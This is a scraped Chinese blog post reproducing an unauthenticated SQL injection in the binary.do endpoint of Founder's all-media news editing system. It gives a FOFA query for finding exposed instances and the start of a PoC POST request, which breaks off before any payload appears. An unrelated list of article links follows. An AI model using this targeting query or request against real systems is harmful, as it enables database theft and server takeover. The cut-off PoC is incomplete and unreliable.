当前位置: 首页 > news >正文

方正畅享全媒体新闻采编系统 binary.do SQL注入漏洞复现

0x01 产品简介

方正畅享全媒体新闻生产系统是以内容资产为核心的智能化融合媒体业务平台,融合了报、网、端、微、自媒体分发平台等全渠道内容。该平台由协调指挥调度、数据资源聚合、融合生产、全渠道发布、智能传播分析、融合考核等多个平台组成,贯穿新闻生产策、采、编、发、存、传、评、营的每个环节, 涵盖桌面端、移动端(超融合掌上编辑部)、大屏端三端联动进行编采业务支撑。平台通过大数据+AI的赋能,助力融媒体在内容生产、数据资产、报道指挥、绩效考核等业务环节。

0x02 漏洞概述

方正畅享全媒体新闻采编系统 binary.do接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。

0x03 复现环境

FOFA:app="FOUNDER-全媒体采编系统"

0x04 漏洞复现

PoC

POST /newsedit/newsplan/task/binary.do HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 智能家居6 -- 配置 ini文件优化设备添加
  • 【C++】详解AVL树——平衡二叉搜索树
  • 电商公司需不需要建数字档案室呢
  • 下一代Docker会让部署更丝滑吗
  • 说些什么好呢
  • 鸿蒙系统和安卓系统通过termux搭建Linux系统—Centos
  • 常见算法(3)
  • AI爆文写作:或许开放性的标题,才会更让人想点开了解答案
  • easy-es EsAutoConfiguration RestHighLevelClient 没有自动注入配置
  • 算法训练营第三十九天 | LeetCode 738 单调递增的数字、LeetCode 968 监控二叉树
  • 非整数倍数据位宽转换24to128
  • Meta发布Chameleon模型预览,挑战多模态AI前沿
  • Softing工业推出新品edgeGate:一款用于工业边缘和云应用的硬件网关
  • 使用VirtualBox+vagrant创建CentOS7虚拟机
  • 简易进程池的实现
  • $translatePartialLoader加载失败及解决方式
  • [数据结构]链表的实现在PHP中
  • 《Javascript数据结构和算法》笔记-「字典和散列表」
  • C++入门教程(10):for 语句
  • Debian下无root权限使用Python访问Oracle
  • ES6之路之模块详解
  • Java多态
  • Median of Two Sorted Arrays
  • mockjs让前端开发独立于后端
  • Python_网络编程
  • rc-form之最单纯情况
  • Redis学习笔记 - pipline(流水线、管道)
  • 半理解系列--Promise的进化史
  • 分享一份非常强势的Android面试题
  • 入门到放弃node系列之Hello Word篇
  • Salesforce和SAP Netweaver里数据库表的元数据设计
  • ​七周四次课(5月9日)iptables filter表案例、iptables nat表应用
  • ‌前端列表展示1000条大量数据时,后端通常需要进行一定的处理。‌
  • (1)SpringCloud 整合Python
  • (1)STL算法之遍历容器
  • (C语言)二分查找 超详细
  • (八)Docker网络跨主机通讯vxlan和vlan
  • (搬运以学习)flask 上下文的实现
  • (保姆级教程)Mysql中索引、触发器、存储过程、存储函数的概念、作用,以及如何使用索引、存储过程,代码操作演示
  • (分布式缓存)Redis持久化
  • (附源码)springboot掌上博客系统 毕业设计063131
  • (附源码)计算机毕业设计ssm基于B_S的汽车售后服务管理系统
  • (官网安装) 基于CentOS 7安装MangoDB和MangoDB Shell
  • (论文阅读22/100)Learning a Deep Compact Image Representation for Visual Tracking
  • (三)centos7案例实战—vmware虚拟机硬盘挂载与卸载
  • (三)SvelteKit教程:layout 文件
  • (图)IntelliTrace Tools 跟踪云端程序
  • (完整代码)R语言中利用SVM-RFE机器学习算法筛选关键因子
  • (转)visual stdio 书签功能介绍
  • (转)利用ant在Mac 下自动化打包签名Android程序
  • (转载)Linux 多线程条件变量同步
  • (状压dp)uva 10817 Headmaster's Headache
  • .md即markdown文件的基本常用编写语法
  • .net 4.0发布后不能正常显示图片问题
  • .net core开源商城系统源码,支持可视化布局小程序